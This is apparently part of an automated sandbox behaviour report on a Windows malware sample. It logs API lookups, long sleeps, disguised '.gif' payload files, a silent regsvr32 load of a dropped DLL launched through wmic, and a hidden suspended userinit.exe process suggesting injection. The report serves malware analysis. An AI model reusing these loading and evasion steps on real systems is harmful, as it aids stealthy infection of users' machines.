Get Address	c:\windows\system32\gdi32.dll	function = SetROP2, address_out = 0x7588f9e0	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetPixel, address_out = 0x758a14f3	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetDIBColorTable, address_out = 0x758a1492	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetBrushOrgEx, address_out = 0x7588c4c5	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetBkMode, address_out = 0x758869b1	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetBkColor, address_out = 0x75886a3c	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SelectPalette, address_out = 0x7588a1f6	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SelectObject, address_out = 0x75886640	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SaveDC, address_out = 0x7588a74b	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = RestoreDC, address_out = 0x7588a67b	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = RectVisible, address_out = 0x75888f13	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = RealizePalette, address_out = 0x7588ef91	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = PatBlt, address_out = 0x758862af	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = MoveToEx, address_out = 0x75888c21	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = MaskBlt, address_out = 0x7588c7ad	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = LineTo, address_out = 0x7588f59b	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = IntersectClipRect, address_out = 0x75887dfe	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetWindowOrgEx, address_out = 0x7588d1bf	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetTextMetricsA, address_out = 0x7588d0f2	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetTextExtentPoint32A, address_out = 0x758907b0	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetSystemPaletteEntries, address_out = 0x7588c2e1	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetStockObject, address_out = 0x75885ddf	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetPixel, address_out = 0x7588c3d5	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetPaletteEntries, address_out = 0x7588c2aa	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetObjectA, address_out = 0x7588914f	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetDeviceCaps, address_out = 0x75886f7f	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetDIBits, address_out = 0x7588a23b	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetDIBColorTable, address_out = 0x7588a149	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetDCOrgEx, address_out = 0x7588fa75	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetCurrentPositionEx, address_out = 0x75888d78	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetClipBox, address_out = 0x75888525	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetBrushOrgEx, address_out = 0x7588c943	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetBitmapBits, address_out = 0x7588c1ba	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = ExcludeClipRect, address_out = 0x75889218	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = DeleteObject, address_out = 0x75885f14	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = DeleteDC, address_out = 0x75886eaa	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateSolidBrush, address_out = 0x75886b49	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreatePenIndirect, address_out = 0x7589744d	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreatePalette, address_out = 0x7588b1b0	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateHalftonePalette, address_out = 0x7588c2cd	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateFontIndirectA, address_out = 0x7588d22d	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateDIBitmap, address_out = 0x7588a379	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateDIBSection, address_out = 0x75888850	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateCompatibleDC, address_out = 0x75886888	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x758873ad	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateBrushIndirect, address_out = 0x7588993c	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateBitmap, address_out = 0x75886b79	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = BitBlt, address_out = 0x758872c0	1	Fn
Get Address	c:\windows\system32\user32.dll	function = CreateWindowExA, address_out = 0x757bbf40	1	Fn
Get Address	c:\windows\system32\user32.dll	function = WindowFromPoint, address_out = 0x757e6be9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = WinHelpA, address_out = 0x757d471e	1	Fn
Get Address	c:\windows\system32\user32.dll	function = WaitMessage, address_out = 0x757c66bd	1	Fn
Get Address	c:\windows\system32\user32.dll	function = UpdateWindow, address_out = 0x757bffa8	1	Fn
Get Address	c:\windows\system32\user32.dll	function = UnregisterClassA, address_out = 0x757b8d70	1	Fn
Get Address	c:\windows\system32\user32.dll	function = UnhookWindowsHookEx, address_out = 0x757badf9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = TranslateMessage, address_out = 0x757c64c7	1	Fn
Get Address	c:\windows\system32\user32.dll	function = TranslateMDISysAccel, address_out = 0x757e1a5a	1	Fn
Get Address	c:\windows\system32\user32.dll	function = TrackPopupMenu, address_out = 0x757d2228	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SystemParametersInfoA, address_out = 0x757b80e0	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ShowWindow, address_out = 0x757bf2a9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ShowScrollBar, address_out = 0x757e3c89	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ShowOwnedPopups, address_out = 0x757e28ca	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ShowCursor, address_out = 0x757b64d3	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetWindowsHookExA, address_out = 0x757e6d0c	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetWindowPos, address_out = 0x757c1bc4	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetWindowPlacement, address_out = 0x757b7f78	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetWindowLongA, address_out = 0x757b8ba3	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetTimer, address_out = 0x757c52ef	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetScrollRange, address_out = 0x757b8ec5	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetScrollPos, address_out = 0x757e04be	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetScrollInfo, address_out = 0x757c48da	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetRect, address_out = 0x757c498b	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetPropA, address_out = 0x757e28e5	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetParent, address_out = 0x757b8314	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetMenuItemInfoA, address_out = 0x757d6d15	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetMenu, address_out = 0x757e6b0e	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetForegroundWindow, address_out = 0x757bb225	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetFocus, address_out = 0x757babad	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetCursor, address_out = 0x757c3075	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetClassLongA, address_out = 0x757e1236	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetCapture, address_out = 0x757e6932	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetActiveWindow, address_out = 0x757c333a	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SendMessageA, address_out = 0x757bad60	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ScrollWindow, address_out = 0x757dfc1d	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ScreenToClient, address_out = 0x757ba506	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RemovePropA, address_out = 0x757e2551	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RemoveMenu, address_out = 0x757b86e8	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ReleaseDC, address_out = 0x757c5421	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ReleaseCapture, address_out = 0x757e69f2	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RegisterWindowMessageA, address_out = 0x757bc091	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RegisterClipboardFormatA, address_out = 0x757bc091	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RegisterClassA, address_out = 0x757bbc6a	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RedrawWindow, address_out = 0x757c29bc	1	Fn
Get Address	c:\windows\system32\user32.dll	function = PtInRect, address_out = 0x757c2392	1	Fn
Get Address	c:\windows\system32\user32.dll	function = PostQuitMessage, address_out = 0x757bb308	1	Fn
Get Address	c:\windows\system32\user32.dll	function = PostMessageA, address_out = 0x757bb446	1	Fn
Get Address	c:\windows\system32\user32.dll	function = PeekMessageA, address_out = 0x757c19a5	1	Fn
Get Address	c:\windows\system32\user32.dll	function = OffsetRect, address_out = 0x757ccdab	1	Fn
Get Address	c:\windows\system32\user32.dll	function = OemToCharA, address_out = 0x7580f041	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MapWindowPoints, address_out = 0x757c5caa	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MapVirtualKeyA, address_out = 0x757e6038	1	Fn
Get Address	c:\windows\system32\user32.dll	function = LoadKeyboardLayoutA, address_out = 0x757fc892	1	Fn
Get Address	c:\windows\system32\user32.dll	function = LoadIconA, address_out = 0x757b64ad	1	Fn
Get Address	c:\windows\system32\user32.dll	function = LoadCursorA, address_out = 0x757b8328	1	Fn
Get Address	c:\windows\system32\user32.dll	function = LoadBitmapA, address_out = 0x757e1608	1	Fn
Get Address	c:\windows\system32\user32.dll	function = KillTimer, address_out = 0x757c64f7	1	Fn
Get Address	c:\windows\system32\user32.dll	function = IsZoomed, address_out = 0x757c4ce9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = IsWindowVisible, address_out = 0x757c4d69	1	Fn
Get Address	c:\windows\system32\user32.dll	function = IsWindowEnabled, address_out = 0x757ba9b9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = IsWindow, address_out = 0x757c53ba	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	1	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	1	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = InitializeFlatSB, address_out = 0x73f6f803	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = UninitializeFlatSB, address_out = 0x73e9d1ea	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x73f6f81f	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x73f107d0	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x73f6f84b	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x73f6f83a	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x73f6f829	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x73f108b6	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x73f6f80e	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x73f10894	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x73f108c7	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x73f108a5	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	1	Fn

Window (19)

»

Operation	Window Name	Additional Information	Success	Count	Logfile
Find	marxvxinhhm0131	-		19	Fn

Keyboard (3)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	1	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Get Info	type = KB_LOCALE_ID	1	Fn

System (38)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = 59214 milliseconds (59.214 seconds)	18	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:13 (UTC)	1	Fn
Get Time	type = Ticks, time = 143879	1	Fn
Get Info	type = Operating System	7	Fn
Get Info	type = Hardware Information	4	Fn
Get Info	type = Operating System	7	Fn

Process #25: regsvr32.exe

696

0

»

Information	Value
ID	#25
File Name	c:\windows\system32\regsvr32.exe
Command Line	"C:\Windows\System32\regsvr32.exe" /s "C:\ProgramData\tempa\marxvxinhhm64.dll"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:25, Reason: Child Process
Unmonitor	End Time: 00:04:31, Reason: Terminated by Timeout
Monitor Duration	00:03:06

OS Process Information

»

Information	Value
PID	0xf18
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F1C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00041fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
regsvr32.exe.mui	0x000e0000	0x000e1fff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x0012ffff	Private Memory	rw	-
pagefile_0x0000000000130000	0x00130000	0x001f7fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000200000	0x00200000	0x00300fff	Pagefile Backed Memory	r	-
private_0x0000000000310000	0x00310000	0x00310fff	Private Memory	rw	-
private_0x0000000000320000	0x00320000	0x0041ffff	Private Memory	rw	-
private_0x0000000000420000	0x00420000	0x00420fff	Private Memory	rw	-
private_0x0000000000430000	0x00430000	0x00431fff	Private Memory	rw	-
private_0x0000000000430000	0x00430000	0x00430fff	Private Memory	rwx	-
pagefile_0x0000000000440000	0x00440000	0x00441fff	Pagefile Backed Memory	r	-
rpcss.dll	0x00450000	0x004abfff	Memory Mapped File	r	-
private_0x0000000000450000	0x00450000	0x005cffff	Private Memory	rw	-
pagefile_0x0000000000450000	0x00450000	0x0052efff	Pagefile Backed Memory	r	-
private_0x0000000000530000	0x00530000	0x00530fff	Private Memory	rw	-
private_0x0000000000530000	0x00530000	0x00534fff	Private Memory	rw	-
private_0x0000000000530000	0x00530000	0x00531fff	Private Memory	rw	-
private_0x0000000000530000	0x00530000	0x00546fff	Private Memory	rw	-
private_0x0000000000530000	0x00530000	0x0058efff	Private Memory	rwx	-
private_0x0000000000590000	0x00590000	0x005cffff	Private Memory	rw	-
marxvxinhhm64.dll	0x005d0000	0x006e7fff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000006f0000	0x006f0000	0x007d9fff	Private Memory	rw	-
private_0x00000000006f0000	0x006f0000	0x0082ffff	Private Memory	rw	-
marxvxinhhm98.dll	0x00830000	0x00948fff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x0000000000950000	0x00950000	0x00a3afff	Private Memory	rw	-
private_0x0000000000950000	0x00950000	0x009cffff	Private Memory	rw	-
private_0x00000000009d0000	0x009d0000	0x009d0fff	Private Memory	rw	-
regsvr32.exe	0x00a40000	0x00a46fff	Memory Mapped File	rwx	-
pagefile_0x0000000000a50000	0x00a50000	0x0164ffff	Pagefile Backed Memory	r	-
private_0x0000000001650000	0x01650000	0x0178ffff	Private Memory	rw	-
private_0x0000000001790000	0x01790000	0x0188ffff	Private Memory	-	-
private_0x0000000001890000	0x01890000	0x0198ffff	Private Memory	-	-
private_0x0000000001990000	0x01990000	0x01a8ffff	Private Memory	-	-
private_0x0000000001a90000	0x01a90000	0x01b8ffff	Private Memory	-	-
private_0x0000000001b90000	0x01b90000	0x01c8ffff	Private Memory	-	-
private_0x0000000001c90000	0x01c90000	0x01d8ffff	Private Memory	-	-
private_0x0000000001d90000	0x01d90000	0x01e8ffff	Private Memory	-	-
private_0x0000000001e90000	0x01e90000	0x01f8ffff	Private Memory	-	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
private_0x000000007ff50000	0x7ff50000	0x7ffaffff	Private Memory	rw	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

File (44)

»

Operation	Filename	Additional Information	Count	Logfile
Create	c:\programdata\tempa\marxvxinhhmxa.gif	-	1	Fn
Create	c:\programdata\tempa\marxvxinhhmxb.gif	-	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	c:\programdata\tempa\marxvxinhhmxa.gif	type = size	1	Fn
Get Info	c:\programdata\tempa\marxvxinhhmxb.gif	type = size	1	Fn
Read	c:\programdata\tempa\marxvxinhhmxa.gif	size = 191488	1	Fn Data
Read	c:\programdata\tempa\marxvxinhhmxb.gif	size = 179712	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data

Registry (37)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CLASSES_ROOT\.dll	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\dllfile	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\dllfile\AutoRegister	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Embarcadero\Locales	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Embarcadero\Locales	-	4	Fn
Open Key	HKEY_CURRENT_USER\Software\CodeGear\Locales	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\CodeGear\Locales	-	4	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	5	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	5	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	1	Fn
Read Value	HKEY_CLASSES_ROOT\.dll	data = dllfile	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	value_name = MS Shell Dlg 2, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	value_name = MS Shell Dlg 2, data = Tahoma, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	value_name = MS Shell Dlg 2, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	value_name = MS Shell Dlg 2, data = Tahoma, type = REG_SZ	1	Fn

Process (20)

»

Operation	Process	Additional Information	Count	Logfile
Create	C:\Windows\System32\userinit.exe	os_pid = 0xf50, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
